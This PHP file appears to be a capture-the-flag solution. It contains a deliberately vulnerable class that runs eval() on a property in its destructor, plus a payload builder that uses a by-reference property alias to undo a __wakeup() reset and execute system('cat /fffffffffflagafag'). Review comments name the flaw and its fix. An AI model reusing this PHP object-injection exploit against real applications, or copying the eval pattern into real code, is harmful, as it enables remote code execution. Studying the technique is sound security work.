unserialize()
serialize()
<?php
/**
 * Deliberately vulnerable demo class: its destructor evaluates a property as PHP code.
 *
 * __wakeup() blanks $a, apparently to neutralise a value supplied through
 * unserialize(). That reset is not sufficient: __destruct() assigns $c to $b
 * before the eval, so when $b is a reference to $a the assignment writes $c
 * into $a again.
 *
 * NOTE(review): the code that calls unserialize() is not shown here. If it
 * receives untrusted input, the fix is on that side: pass
 * ['allowed_classes' => false] to unserialize() or switch to json_decode(),
 * and remove the eval() from the destructor.
 */
class test
{
    /** Code string handed to eval() when the object is destroyed. */
    public $a;

    /** Overwritten with $c in __destruct(); may be bound by reference to another property. */
    public $b;

    /** Value copied into $b just before the eval. */
    public $c;

    public function __construct()
    {
    }

    /**
     * Clears $a. PHP invokes this hook after unserialize() rebuilds the object.
     */
    public function __wakeup()
    {
        $this->a = '';
    }

    /**
     * Copies $c into $b, then evaluates $a as PHP code.
     */
    public function __destruct()
    {
        // The order matters: if $b aliases $a, this assignment also replaces $a,
        // which undoes the reset performed in __wakeup().
        $this->b = $this->c;

        // NOTE(review): eval() on a property that can be set through
        // deserialization is code execution by design; flagged, not changed.
        eval($this->a);
    }
}
// Builds the object graph that shows why the __wakeup() reset in class test
// does not hold, then prints its serialized form.
$payload = new test();

// Bind $b to $a by reference; serialize() records the alias, so the
// deserialized object keeps both names pointing at the same value.
$payload->b = &$payload->a;

// __destruct() copies $c into $b (and therefore into $a) before the eval.
$payload->c = "system('cat /fffffffffflagafag');";

$serialized = serialize($payload);
echo $serialized;
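?>// 可绕过 __wakeup():$b 是 $a 的引用,__wakeup() 把 $a 置空之后,__destruct() 中的 $this->b=$this->c 会通过引用把 $c 的内容重新写入 $a,因此 eval($this->a) 执行的仍是 $c 的内容。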